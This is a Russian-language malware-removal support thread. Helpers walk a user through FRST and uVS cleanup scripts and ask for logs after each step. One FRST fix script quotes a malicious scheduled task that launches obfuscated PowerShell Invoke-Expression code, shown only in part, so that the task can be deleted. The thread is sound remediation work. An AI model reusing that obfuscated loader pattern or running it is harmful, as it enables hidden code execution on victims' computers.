Sandor Опубликовано 25 марта Share Опубликовано 25 марта Отключите до перезагрузки антивирус. Выделите следующий код: Start:: CloseProcesses: SystemRestore: On CreateRestorePoint: Task: {36D0A3F9-EFDA-4430-9646-7D7EC6308F49} - System32\Tasks\$nya-CcVuc329 => C:\Windows\system32\cmd.exe [339968 2025-03-12] (Microsoft Windows -> Microsoft Corporation) -> /C echo function mXiJ($ocUH){ Invoke-Expression -Debug -InformationAction Ignore '$Bwqa=ie[ieSyiestieemie.Sieeiecieuierieiietyie.ieCierieyiepietoiegierieaiepiehiey.ieAieeiesie]:ie:ieCierieeieatieeie(ie);'.Replace('ie', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction (запись имеет ещё 3541 символов). <==== ВНИМАНИЕ FirewallRules: [{DD1CE507-77A0-4C90-BBB4-4F4468856A14}] => (Allow) C:\Users\piggy\MediaGet2\mediaget.exe => Нет файла FirewallRules: [{6A5DAEB1-DEE7-47AE-A319-76EC3E56588C}] => (Allow) C:\Users\piggy\MediaGet2\mediaget.exe => Нет файла FirewallRules: [{6B9FD7B8-B9FA-4513-B3C9-27DB457F5857}] => (Allow) C:\Users\piggy\MediaGet2\QtWebEngineProcess.exe => Нет файла FirewallRules: [{EF9D1807-7C8F-4DF3-8BA7-D59544D53B89}] => (Allow) C:\Users\piggy\MediaGet2\QtWebEngineProcess.exe => Нет файла Reboot: End:: Скопируйте выделенный текст (правой кнопкой - Копировать). Запустите FRST (FRST64) от имени администратора. Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Компьютер будет перезагружен автоматически. Подробнее читайте в этом руководстве. После этого проверьте ещё раз антивирусом Касперского. 1 Ссылка на комментарий Поделиться на другие сайты More sharing options...
eosex Опубликовано 25 марта Автор Share Опубликовано 25 марта Все так же... фикс прикрепил, не понимаю, почему не получается их удалить.. Fixlog.txt Ссылка на комментарий Поделиться на другие сайты More sharing options...
eosex Опубликовано 25 марта Автор Share Опубликовано 25 марта помогите, пожалуйста Ссылка на комментарий Поделиться на другие сайты More sharing options...
thyrex Опубликовано 25 марта Share Опубликовано 25 марта Очистите отчеты антивируса с найденными угрозами, запустите полную проверку антивирусом и сообщите результат. 1 Ссылка на комментарий Поделиться на другие сайты More sharing options...
eosex Опубликовано 25 марта Автор Share Опубликовано 25 марта SEPEH пропали, но пишется, что 1 объект не обработан. Захожу посмотреть, что за объект, а его просто него. Ссылка на комментарий Поделиться на другие сайты More sharing options...
Sandor Опубликовано 26 марта Share Опубликовано 26 марта Соберите ещё раз новые логи FRST.txt и Addition.txt Ссылка на комментарий Поделиться на другие сайты More sharing options...
Sandor Опубликовано 26 марта Share Опубликовано 26 марта А также ещё раз соберите образ uVS, пожалуйста. Ссылка на комментарий Поделиться на другие сайты More sharing options...
eosex Опубликовано 26 марта Автор Share Опубликовано 26 марта Извиняюсь, спал. Все прикрепил! Addition.txt FRST.txt ARGENTYPE_2025-03-26_14-16-36_v4.99.10v x64.7z Ссылка на комментарий Поделиться на другие сайты More sharing options...
Sandor Опубликовано 26 марта Share Опубликовано 26 марта В логах я проблем не вижу. 16 часов назад, eosex сказал: пишется, что 1 объект не обработан Это всё ещё есть? Ссылка на комментарий Поделиться на другие сайты More sharing options...
eosex Опубликовано 26 марта Автор Share Опубликовано 26 марта щас проверку запустил, скажу если что-то не так Ссылка на комментарий Поделиться на другие сайты More sharing options...
Sandor Опубликовано 26 марта Share Опубликовано 26 марта Хорошо. По окончании сделаем некоторую очистку. Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Откройте папку с распакованной утилитой uVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем". Выделите и правой кнопкой мыши скопируйте следующий скрипт в буфер обмена: ;uVS v4.99.10v x64 [http://dsrt.dyndns.org:8888] ;Target OS: NTv11.0 v400c ;---------command-block--------- delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\BNXHAIMOJRLGGDXNTJGRBUBJGMBWV delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\FBZQZKYQWHMMOYWSDKXSONUCTVO delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\JCZIHPSLDYBAISDGURDJNFEWNUFVD delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\TUUFEMTZNEUSPYUFOOBOX delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\VCPLITLKUBMKH delref %SystemDrive%\USERS\PIGGY\APPDATA\LOCAL\TEMP\XSYBZVJJKRJNKEV apply regt 40 restart В uVS выберите пункт меню "Скрипт" => "Выполнить скрипт находящийся в буфере обмена…" Нажмите на кнопку "Выполнить" и дождитесь окончания работы программы. Прошу учесть, что компьютер будет перезагружен. В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его к своему сообщению. Подробнее читайте в этом руководстве. Ссылка на комментарий Поделиться на другие сайты More sharing options...
eosex Опубликовано 26 марта Автор Share Опубликовано 26 марта Очистку сделал Ссылка на комментарий Поделиться на другие сайты More sharing options...
Sandor Опубликовано 26 марта Share Опубликовано 26 марта 14 минут назад, Sandor сказал: В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его к своему сообщению Файл забыли. Ссылка на комментарий Поделиться на другие сайты More sharing options...
eosex Опубликовано 26 марта Автор Share Опубликовано 26 марта 2025-03-26_15-09-18_log.txt Ссылка на комментарий Поделиться на другие сайты More sharing options...
Sandor Опубликовано 26 марта Share Опубликовано 26 марта Чтобы просмотреть отчеты, выполните следующие действия: В главном окне приложения в разделе Мониторинг нажмите на плитку Отчеты. Отчеты В списке компонентов и задач выберите компонент или задачу. ... Если требуется просмотреть подробную информацию о событии, выберите в отчете нужное событие. Так получится посмотреть (а лучше экспортировать) отчёт об этой невидимой угрозе? Ссылка на комментарий Поделиться на другие сайты More sharing options...
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти